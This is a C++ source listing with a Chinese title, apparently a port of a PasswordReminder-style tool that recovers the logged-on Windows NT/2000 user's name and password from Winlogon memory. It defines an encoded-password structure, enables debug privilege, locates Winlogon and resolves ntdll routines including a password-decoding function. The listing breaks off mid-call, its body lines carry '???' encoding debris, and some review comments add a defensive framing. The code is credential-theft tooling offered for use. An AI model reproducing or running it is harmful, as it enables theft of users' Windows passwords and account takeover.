
C++中获取WinNT/Win2k当前用户名和密码


// 获取WinNT/Win2k当前用户名和密码,调用以下函数即可:
// bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
//---------------------------------------------------------------------------
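// Counted wide-character string in the layout the ntdll entry points declared
// below take. The listing redeclares it instead of including the DDK header;
// the only fix here is the mangled `strUCt` keyword, which did not compile.
typedef struct _UNICODE_STRING
{
    USHORT Length;          // NOTE(review): presumably a byte count, not characters — confirm against the DDK definition
    USHORT MaximumLength;   // NOTE(review): presumably bytes available in Buffer — confirm
    PWSTR Buffer;           // NOTE(review): treat as not NUL-terminated; honour Length when reading
} UNICODE_STRING, *PUNICODE_STRING;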
// Fixed-layout record for one handle-table entry. From this listing only the
// field names are known; the code that fills and walks these records
// (presumably through pfnNtQuerySystemInformation) is outside the visible
// portion, so no field semantics are asserted here.
struct _QUERY_SYSTEM_INFORMATION
{
    DWORD GrantedAccess;
    DWORD PID;
    WORD  HandleType;
    WORD  HandleId;
    DWORD Handle;
};
typedef struct _QUERY_SYSTEM_INFORMATION  QUERY_SYSTEM_INFORMATION;
typedef struct _QUERY_SYSTEM_INFORMATION *PQUERY_SYSTEM_INFORMATION;
// Header that precedes a run of PROCESS_INFO records. Count is the only
// field the author named; Unk04/Unk08 are left uninterpreted, and the
// consumer of this header lies outside the visible listing.
struct _PROCESS_INFO_HEADER
{
    DWORD Count;
    DWORD Unk04;    // uninterpreted
    DWORD Unk08;    // uninterpreted
};
typedef struct _PROCESS_INFO_HEADER  PROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO_HEADER *PPROCESS_INFO_HEADER;
// One entry of the per-process table described by PROCESS_INFO_HEADER.
// Name is a fixed 0x108-byte narrow buffer; nothing in the visible listing
// shows whether it is guaranteed NUL-terminated, so readers should bound
// by sizeof(Name). The UnkNN fields are left uninterpreted by the author.
struct _PROCESS_INFO
{
    DWORD LoadAddress;
    DWORD Size;
    DWORD Unk08;        // uninterpreted
    DWORD Enumerator;
    DWORD Unk10;        // uninterpreted
    char  Name[0x108];  // bound reads by sizeof(Name)
};
typedef struct _PROCESS_INFO  PROCESS_INFO;
typedef struct _PROCESS_INFO *PPROCESS_INFO;
// Record that carries an encoded credential (EncodedPassword) together with
// a logon timestamp and several words the author did not name. Only the
// layout is established here: the code that reads this record and the use
// of HashByte are outside the visible portion of the listing, so their
// semantics are not documented. From a defender's standpoint the value of
// interest is that the credential sits in another process's memory in a
// reversible form, which is exactly what memory-access auditing on
// Winlogon is meant to catch.
struct _ENCODED_PASSWORD_INFO
{
    DWORD          HashByte;
    DWORD          Unk04;       // uninterpreted
    DWORD          Unk08;       // uninterpreted
    DWORD          Unk0C;       // uninterpreted
    FILETIME       LoggedOn;
    DWORD          Unk18;       // uninterpreted
    DWORD          Unk1C;       // uninterpreted
    DWORD          Unk20;       // uninterpreted
    DWORD          Unk24;       // uninterpreted
    DWORD          Unk28;       // uninterpreted
    UNICODE_STRING EncodedPassword;
};
typedef struct _ENCODED_PASSWORD_INFO  ENCODED_PASSWORD_INFO;
typedef struct _ENCODED_PASSWORD_INFO *PENCODED_PASSWORD_INFO;

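// Calling-convention-correct pointer types for the ntdll exports resolved by
// GetProcAddress further down. Two of the original lines carried a stray
// mis-encoded character between the pointer declarator and the parameter
// list (`)? (`), which is a syntax error; that is the only change here.
// The parameter types are the author's own; the listing does not show the
// official signatures, so treat them as unverified.
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)        (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER)       (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void  (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER)      (PVOID);
typedef void  (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)      (BYTE, PUNICODE_STRING);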

// Private prototypes, grouped by role. The two entry points the listing
// describes as prerequisites — AddDebugPrivilege (needs SeDebugPrivilege)
// and FindWinLogon (locates the Winlogon process) — are also the two
// high-signal events an endpoint monitor can alert on: privilege
// acquisition by an unprivileged binary and a cross-process handle to
// Winlogon.

// OS-version gates (the listing only supports NT and 2000).
BOOL IsWinNT(void);
BOOL IsWin2K(void);

// Prerequisites for the search.
BOOL AddDebugPrivilege(void);
DWORD FindWinLogon(void);

// Per-platform locate-and-extract steps.
BOOL LocatePasswordPageWinNT(DWORD, PDWORD);
BOOL LocatePasswordPageWin2K(DWORD, PDWORD);
void ReturnWinNTPwd(String &, String &, String &);
void ReturnWin2kPwd(String &, String &, String &);

// Public-facing entry point (note: returns C++ bool, not Win32 BOOL).
bool GetPassword(String &, String &, String &);

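// Global Variables
// All of these have static storage and were already zero-initialised; the
// explicit initialisers below only make that visible. The buffer size was a
// bare 0x400 literal in two places — it is now a single named constant.

// Resolved ntdll entry points; NULL until GetPassword loads them.
PFNNTQUERYSYSTEMINFORMATION        pfnNtQuerySystemInformation        = NULL;
PFNRTLCREATEQUERYDEBUGBUFFER       pfnRtlCreateQueryDebugBuffer       = NULL;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation = NULL;
PFNRTLDESTROYQUERYDEBUGBUFFER      pfnRtlDestroyQueryDebugBuffer      = NULL;
PFNTRTLRUNDECODEUNICODESTRING      pfnRtlRunDecodeUnicodeString       = NULL;

// Credential material recovered from the target process. In the visible
// portion of the listing nothing releases or clears pvRealPwd/pvPwd, so the
// recovered secret outlives its use in this process's memory — a point a
// reviewer would want confirmed against the rest of the file.
DWORD dwPwdLen   = 0;
PVOID pvRealPwd  = NULL;
PVOID pvPwd      = NULL;
DWORD dwHashByte = 0;

// Wide buffers for the logged-on account; callers must bound writes by
// NAME_BUF_CHARS (or sizeof(buffer)/sizeof(wchar_t)).
enum { NAME_BUF_CHARS = 0x400 };
wchar_t wszUserName[NAME_BUF_CHARS];
wchar_t wszUserDomain[NAME_BUF_CHARS];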
//---------------------------------------------------------------------------
??? bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
??? {
??????????? if(!IsWinNT() && !IsWin2K())
??????? {
??????????? // 只适合于2000或者XP
??????????? return false;
??????? }
??????? // Add debug privilege to PasswordReminder -
??????? // this is needed for the search for Winlogon.
??????? if(!AddDebugPrivilege())
??????? {
??????????? // 不能够添加debug特权
??????????? return false;
??????? }
??????? // debug特权已经成功加入到本程序
??????? HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
??????? pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
??????????????? GetProcAddress(hNtDll,"NtQuerySystemInformation");
??????? pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
??????????????? GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
??????? pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
??????????????? GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
??????? pfnRtlDestroyQueryDebugBuffer =??? (PFNRTLDESTROYQUERYDEBUGBUFFER)
??????????????? GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
??????? pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
??????????????? GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString
